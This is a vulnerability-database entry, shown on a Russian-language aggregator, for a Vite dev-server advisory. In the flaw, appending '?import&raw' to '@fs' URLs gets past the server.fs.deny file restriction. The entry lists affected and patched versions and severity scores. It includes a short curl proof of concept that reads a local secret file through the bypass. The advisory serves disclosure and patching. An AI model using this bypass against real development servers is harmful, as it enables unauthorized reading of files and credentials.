Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-9cwx-2883-4wfx

Опубликовано: 17 сент. 2024
Источник: github
Github: Прошло ревью
CVSS4: 6.9
CVSS3: 5.3

Описание

Vite's server.fs.deny is bypassed when using ?import&raw

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev $ echo "top secret content" > /tmp/secret.txt # expected behaviour $ curl "http://localhost:5173/@fs/tmp/secret.txt" <body> <h1>403 Restricted</h1> <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list. # security bypassed $ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw" export default "top secret content\n" //# sourceMappingURL=data:application/json;base64,eyJ2...

Пакеты

Наименование

vite

npm
Затронутые версииВерсия исправления

>= 5.4.0, <= 5.4.5

5.4.6

Наименование

vite

npm
Затронутые версииВерсия исправления

>= 5.3.0, <= 5.3.5

5.3.6

Наименование

vite

npm
Затронутые версииВерсия исправления

>= 5.2.0, < 5.2.14

5.2.14

Наименование

vite

npm
Затронутые версииВерсия исправления

>= 4.0.0, <= 4.5.3

4.5.4

Наименование

vite

npm
Затронутые версииВерсия исправления

<= 3.2.10

3.2.11

Наименование

vite

npm
Затронутые версииВерсия исправления

>= 5.0.0, <= 5.1.7

5.1.8

EPSS

Процентиль: 2%
0.00014
Низкий

6.9 Medium

CVSS4

5.3 Medium

CVSS3

Дефекты

CWE-200
CWE-284

Связанные уязвимости

CVSS3: 4.8
redhat
больше 1 года назад

Vite a frontend build tooling framework for javascript. In affected versions the contents of arbitrary files can be returned to the browser. `@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists. This issue has been patched in versions 5.4.6, 5.3.6, 5.2.14, 4.5.5, and 3.2.11. Users are advised to upgrade. There are no known workarounds for this vulnerability.

CVSS3: 4.8
nvd
больше 1 года назад

Vite a frontend build tooling framework for javascript. In affected versions the contents of arbitrary files can be returned to the browser. `@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists. This issue has been patched in versions 5.4.6, 5.3.6, 5.2.14, 4.5.5, and 3.2.11. Users are advised to upgrade. There are no known workarounds for this vulnerability.

CVSS3: 4.8
debian
больше 1 года назад

Vite a frontend build tooling framework for javascript. In affected ve ...

EPSS

Процентиль: 2%
0.00014
Низкий

6.9 Medium

CVSS4

5.3 Medium

CVSS3

Дефекты

CWE-200
CWE-284